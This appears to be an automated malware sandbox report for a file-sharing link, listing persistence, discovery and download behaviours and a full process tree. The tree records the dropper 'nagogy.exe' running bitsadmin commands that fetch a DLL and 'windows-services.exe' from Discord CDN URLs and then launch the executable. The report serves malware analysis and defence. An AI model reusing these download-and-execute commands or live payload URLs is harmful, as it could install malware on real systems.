hxxps://gofile[.]io/d/tv0UYJ

Resubmissions

10/05/2023, 15:47

230510-s8ea1agh95 8

Analysis

max time kernel
198s
max time network
195s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
10/05/2023, 15:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/tv0UYJ

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
5316	nagogy.exe
5324	nagogy.exe
360	windows-services.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\windows-services = "C:\\Users\\Admin\\AppData\\Local\\Temp\\windows-services"	windows-services.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run\windows-services = "C:\\Users\\Admin\\AppData\\Local\\Temp\\windows-services"	windows-services.exe

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
579	ipinfo.io
580	ipinfo.io
581	ipinfo.io
583	ipinfo.io
573	ipinfo.io
574	ipinfo.io

Download via BitsAdmin 1 TTPs 4 IoCs

dropper

BITS Jobs

T1197

pid	Process
5524	bitsadmin.exe
2240	bitsadmin.exe
3364	bitsadmin.exe
6012	bitsadmin.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
3388	taskkill.exe
656	taskkill.exe
4768	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133282144783344582"	chrome.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1012	chrome.exe
1012	chrome.exe
5948	powershell.exe
5948	powershell.exe
5948	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 43 IoCs

pid	Process
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeShutdownPrivilege	1012	chrome.exe
Token: SeCreatePagefilePrivilege	1012	chrome.exe
Token: SeDebugPrivilege	656	taskkill.exe
Token: SeDebugPrivilege	4768	taskkill.exe
Token: SeDebugPrivilege	5948	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1012 wrote to memory of 1008	1012	chrome.exe	66
PID 1012 wrote to memory of 1008	1012	chrome.exe	66
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4648	1012	chrome.exe	69
PID 1012 wrote to memory of 4644	1012	chrome.exe	68
PID 1012 wrote to memory of 4644	1012	chrome.exe	68
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70
PID 1012 wrote to memory of 2424	1012	chrome.exe	70

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://gofile.io/d/tv0UYJ
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffec8c39758,0x7ffec8c39768,0x7ffec8c39778
  2⤵
  PID:1008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:4644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:2
  2⤵
  PID:4648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:2424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:2624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2964 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:1312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4604 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:4408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4784 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:3916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3324 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:1020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3336 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5244 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:1896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5512 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:1164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5684 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:3792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5812 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:3900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6696 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6676 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:4432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=7500 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:4776
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=7492 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:1312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=8016 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:3440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=7476 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=7440 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=7304 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:1636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=7120 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:3912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6572 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:4772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6008 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6812 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:3472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8784 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8656 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:2320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=7620 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:4328
- C:\Users\Admin\Downloads\nagogy.exe
  "C:\Users\Admin\Downloads\nagogy.exe"
  2⤵
  - Executes dropped EXE
  PID:5316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cmd /c bitsadmin /transfer "Downloading libcurl-x64.dll" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559368600133642/libcurl-x64.dll" "%LOCALAPPDATA%\Temp\libcurl-x64.dll" >nul
    3⤵
    PID:5440
  - - C:\Windows\system32\cmd.exe
      cmd /c bitsadmin /transfer "Downloading libcurl-x64.dll" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559368600133642/libcurl-x64.dll" "C:\Users\Admin\AppData\Local\Temp\libcurl-x64.dll"
      4⤵
      PID:5452
    - - C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer "Downloading libcurl-x64.dll" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559368600133642/libcurl-x64.dll" "C:\Users\Admin\AppData\Local\Temp\libcurl-x64.dll"
        5⤵
        Download via BitsAdmin
        
        PID:5524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cmd /c bitsadmin /transfer "Downloading windows-services.exe" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559654160924672/windows-services.exe" "%LOCALAPPDATA%\Temp\windows-services.exe" >nul
    3⤵
    PID:4832
  - - C:\Windows\system32\cmd.exe
      cmd /c bitsadmin /transfer "Downloading windows-services.exe" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559654160924672/windows-services.exe" "C:\Users\Admin\AppData\Local\Temp\windows-services.exe"
      4⤵
      PID:6072
    - - C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer "Downloading windows-services.exe" "https://cdn.discordapp.com/attachments/1055888135671795823/1105559654160924672/windows-services.exe" "C:\Users\Admin\AppData\Local\Temp\windows-services.exe"
        5⤵
        Download via BitsAdmin
        
        PID:2240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cmd /c start "" "%LOCALAPPDATA%\Temp\windows-services.exe"
    3⤵
    PID:1532
  - - C:\Windows\system32\cmd.exe
      cmd /c start "" "C:\Users\Admin\AppData\Local\Temp\windows-services.exe"
      4⤵
      PID:1596
    - - C:\Users\Admin\AppData\Local\Temp\windows-services.exe
        
        "C:\Users\Admin\AppData\Local\Temp\windows-services.exe"
        5⤵
        Adds Run key to start application
        
        PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6700 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:8
  2⤵
  PID:6048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5676 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6760 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=6784 --field-trial-handle=1832,i,4798251725698149989,17389609304773671689,131072 /prefetch:1
  2⤵
  PID:6104
- C:\Program Files\Google\Chrome\Application\chrome.exe
